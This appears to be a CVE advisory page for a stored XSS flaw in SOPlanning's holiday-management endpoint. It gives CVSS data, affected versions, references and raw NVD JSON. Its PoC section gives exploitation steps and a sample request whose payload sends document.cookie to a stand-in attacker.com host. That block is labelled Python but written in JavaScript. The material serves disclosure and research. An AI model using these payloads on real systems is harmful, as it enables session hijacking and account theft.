CVE-2025-62731

Description

SOPlanning is vulnerable to Stored XSS in /feries endpoint. Malicious attacker with access to public holidays feature is able to inject arbitrary HTML and JS into website, which will be rendered/executed when opening multiple pages. By default only administrators and users with special privileges are able to access this endpoint. This issue was fixed in version 1.55.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* - VULNERABLE

SOPlanning < 1.55

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-62731 Stored XSS PoC for SOPlanning /feries endpoint
// This PoC demonstrates the XSS injection in the public holidays feature

// Payload: <script>alert(document.cookie)</script>
// Or more sophisticated payload for session hijacking:
// <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

// Steps to exploit:
// 1. Login to SOPlanning with admin or privileged user account
// 2. Navigate to the /feries endpoint (Holiday management page)
// 3. Add a new holiday with XSS payload in name/description field
// 4. Save the holiday - payload is stored in database
// 5. Any user viewing holidays or related pages will trigger the XSS

// Example HTTP POST request to /feries endpoint:
const pocPayload = {
    method: 'POST',
    path: '/feries',
    body: {
        name: '<script>alert(String.fromCharCode(88,83,83))</script>',
        date: '2025-01-01',
        description: '<img src=x onerror=fetch("https://attacker.com?c="+document.cookie)>'
    }
};

// The injected script will execute when:
// - Viewing the holidays list
// - Viewing calendar with holidays displayed
// - Any page that renders holiday information

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62731
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62731
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62731/
[4] VulDB https://vuldb.com/cve/CVE-2025-62731
[5] https://cert.pl/en/posts/2025/11/CVE-2025-62293
[6] https://www.soplanning.org/en/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62731", "sourceIdentifier": "[email protected]", "published": "2025-11-20T16:16:00.363", "lastModified": "2025-11-24T13:53:27.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOPlanning is vulnerable to Stored XSS in /feries endpoint. Malicious attacker with access to public holidays feature is able to inject arbitrary HTML and JS into website, which will be rendered/executed when opening multiple pages. By default only administrators and users with special privileges are able to access this endpoint.\n\nThis issue was fixed in version 1.55."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.55.00", "matchCriteriaId": "C84D5087-6ED4-47E4-9E68-F1881726E7D2"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2025/11/CVE-2025-62293", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.soplanning.org/en/", "source": "[email protected]", "tags": ["Product"]}]}}